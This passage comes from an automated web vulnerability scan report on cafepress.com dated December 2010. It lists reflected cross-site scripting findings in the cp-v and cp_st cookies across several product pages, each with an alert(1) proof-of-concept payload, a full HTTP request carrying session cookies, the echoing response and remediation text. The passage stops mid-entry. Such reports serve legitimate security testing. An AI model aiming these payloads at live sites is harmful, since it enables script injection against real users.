cp-v=D0026F27AADDAF9A26C54608326FC1BA9849b"-alert(1)-"0b830c7e51f ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW13 Cteonnt-Length: 60350 Date: Sun, 26 Dec 2010 13:46:59 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:59 GMT; path=/ Set-Cookie: cp_sc=100031; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:59 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 60350 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... 2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T"; s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA9849b"-alert(1)-"0b830c7e51f "; s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID if (s.eVar26 == "") { if ("" == "affiliate") { s.eVar26 = "2099"; //2099 = affiliate } el...[SNIP]...
1.65. http://www.cafepress.com/+sweatshirts-hoodies [cp_st cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /+sweatshirts-hoodies
Issue detail
The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 19caf</script><script>alert(1)</script>e4e8e544a2a was submitted in the cp_st cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /+sweatshirts-hoodies HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=19caf</script><script>alert(1)</script>e4e8e544a2a ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; 
__utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW18 Cteonnt-Length: 60367 Date: Sun, 26 Dec 2010 13:46:56 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:57 GMT; path=/ Set-Cookie: cp_sc=100031; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:57 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 60367 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... = 'cafepress.com'; window.cafepress.originCountryCode = 'US' window.cafepress.tealeaf = {}; window.cafepress.tealeaf.pageLandingType = 'SearchResults' window.cafepress.tealeaf.searchTerm = '19caf</script><script>alert(1)</script>e4e8e544a2a ' window.cafepress.tealeaf.salesChannel = 'Marketplace' window.cafepress.tealeaf.trafficMedium = 'OMM' window.cafepress.tealeaf.utmTracking = '' window.cafepress.tealeaf.abTestString = 'EXP_08_00:C...[SNIP]...
1.66. http://www.cafepress.com/+thermos [cp-v cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /+thermos
Issue detail
The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 179e4"-alert(1)-"9112d7547c6 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /+thermos HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA179e4"-alert(1)-"9112d7547c6 ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW14 Cteonnt-Length: 58907 Date: Sun, 26 Dec 2010 13:47:30 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:30 GMT; path=/ Set-Cookie: cp_sc=100465; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:30 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 58907 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... 2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T"; s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA179e4"-alert(1)-"9112d7547c6 "; s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID if (s.eVar26 == "") { if ("" == "affiliate") { s.eVar26 = "2099"; //2099 = affiliate } el...[SNIP]...
1.67. http://www.cafepress.com/+thermos [cp_st cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /+thermos
Issue detail
The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dee73</script><script>alert(1)</script>b29a0dee205 was submitted in the cp_st cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /+thermos HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=dee73</script><script>alert(1)</script>b29a0dee205 ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; 
__utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW18 Cteonnt-Length: 58934 Date: Sun, 26 Dec 2010 13:47:29 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:29 GMT; path=/ Set-Cookie: cp_sc=100465; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:29 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 58934 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... = 'cafepress.com'; window.cafepress.originCountryCode = 'US' window.cafepress.tealeaf = {}; window.cafepress.tealeaf.pageLandingType = 'SearchResults' window.cafepress.tealeaf.searchTerm = 'dee73</script><script>alert(1)</script>b29a0dee205 ' window.cafepress.tealeaf.salesChannel = 'Marketplace' window.cafepress.tealeaf.trafficMedium = 'SEO' window.cafepress.tealeaf.utmTracking = '' window.cafepress.tealeaf.abTestString = 'EXP_08_00:C...[SNIP]...
1.68. http://www.cafepress.com/+underwear-panties [cp-v cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /+underwear-panties
Issue detail
The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f16ed"-alert(1)-"d43c21ef02f was submitted in the cp-v cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /+underwear-panties HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BAf16ed"-alert(1)-"d43c21ef02f ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW15 Cteonnt-Length: 59420 Date: Sun, 26 Dec 2010 13:47:21 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:21 GMT; path=/ Set-Cookie: cp_sc=100246; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:21 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 59420 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... 2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T"; s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BAf16ed"-alert(1)-"d43c21ef02f "; s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID if (s.eVar26 == "") { if ("" == "affiliate") { s.eVar26 = "2099"; //2099 = affiliate } el...[SNIP]...
1.69. http://www.cafepress.com/+underwear-panties [cp_st cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /+underwear-panties
Issue detail
The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7c3af</script><script>alert(1)</script>ca50a4bf9d6 was submitted in the cp_st cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /+underwear-panties HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=7c3af</script><script>alert(1)</script>ca50a4bf9d6 ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW12
Cteonnt-Length: 59441
Date: Sun, 26 Dec 2010 13:47:17 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:17 GMT; path=/
Set-Cookie: cp_sc=100246; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:17 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 59441

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h...[SNIP]...
= 'cafepress.com';
window.cafepress.originCountryCode = 'US'
window.cafepress.tealeaf = {};
window.cafepress.tealeaf.pageLandingType = 'SearchResults'
window.cafepress.tealeaf.searchTerm = '7c3af</script><script>alert(1)</script>ca50a4bf9d6 '
window.cafepress.tealeaf.salesChannel = 'Marketplace'
window.cafepress.tealeaf.trafficMedium = 'SEO'
window.cafepress.tealeaf.utmTracking = ''
window.cafepress.tealeaf.abTestString = 'EXP_08_00:C...[SNIP]...
1.70. http://www.cafepress.com/+water-bottles [cp-v cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /+water-bottles
Issue detail
